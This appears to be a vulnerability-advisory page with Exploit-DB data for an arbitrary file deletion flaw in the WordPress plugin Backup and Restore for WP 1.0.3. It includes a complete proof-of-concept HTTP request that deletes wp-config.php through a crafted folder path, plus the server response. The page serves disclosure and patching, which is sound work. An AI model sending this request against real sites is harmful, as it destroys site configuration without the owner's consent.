WordPress Plugin Backup and Restore 1.0.3 - Arbitrary File Deletion

vendor:

Backup and Restore for WP

by:

Murat DEMIRCI

8.8

CVSS

HIGH

Arbitrary File Deletion

CWE

Product Name: Backup and Restore for WP

Affected Version From: 1.0.3

Affected Version To: 1.0.3

Patch Exists: YES

Related CWE:

CPE: a:miniorange:backup_and_restore_for_wp

Metasploit:

Other Scripts:

Platforms Tested: Windows 10

2021

WordPress Plugin Backup and Restore 1.0.3 – Arbitrary File Deletion

A vulnerability exists in WordPress Plugin Backup and Restore 1.0.3 which allows an attacker to delete arbitrary files on the server. An attacker can send a specially crafted POST request to the vulnerable endpoint /wordpress/wp-admin/admin-ajax.php with the parameters action=barfw_backup_ajax_redirect&call_type=delete_backup&file_name=wp-config.php&folder_name=C%3a%5cxampp%5chtdocs%5cwordpress%5c%5c&id=5&nonce=ee90968cce to delete arbitrary files on the server. This vulnerability is due to improper input validation and can be exploited by an authenticated user with admin privileges.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update the plugin to the latest version.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Backup and Restore  1.0.3 - Arbitrary File Deletion
# Date: 11/07/2021
# Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
# Vendor Homepage: https://www.miniorange.com/
# Software Link: https://wordpress.org/plugins/backup-and-restore-for-wp/
# Version: 1.0.3
# Tested on : Windows 10

#Poc:

----------------------------------REQUEST---------------------------------------

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=mo_eb_backup_report
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 155
Origin: http://localhost
Connection: close
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1636463166%7C9VH5dtz6rmSefsnxLUWgFNF85FReGRWg61Nhbu95sJZ%7E82178aa467cd00f9cbcce03c6157fdcbf581a715d3cdc7a6b5c940dafe58fifd; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9371ce3ee91=admin%7C1836463166%7C9VH5dtz6rmSefsnxLUZgFNF85FReGRWg61Vhau95sJZ%7C9ae26395803f7d17f75c62d98856f3249e72688d38a9d3dbb616a0e3c808c917; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do%26posts_list_mode%3Dlist; wp-settings-time-1=1636290368
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=barfw_backup_ajax_redirect&call_type=delete_backup&file_name=wp-config.php&folder_name=C%3a%5cxampp%5chtdocs%5cwordpress%5c%5c&id=5&nonce=ee90968cce


----------------------------------------------------------------------------------



-------------------------------RESPONSE-------------------------------------------

HTTP/1.1 200 OK
Date: Sun, 07 Nov 2021 13:19:38 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7
X-Powered-By: PHP/8.0.7
Access-Control-Allow-Origin: http://localhost
Access-Control-Allow-Credentials: true
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Referrer-Policy: strict-origin-when-cross-origin
Content-Length: 9
Connection: close
Content-Type: application/json; charset=UTF-8

"success"

----------------------------------------------------------------------------------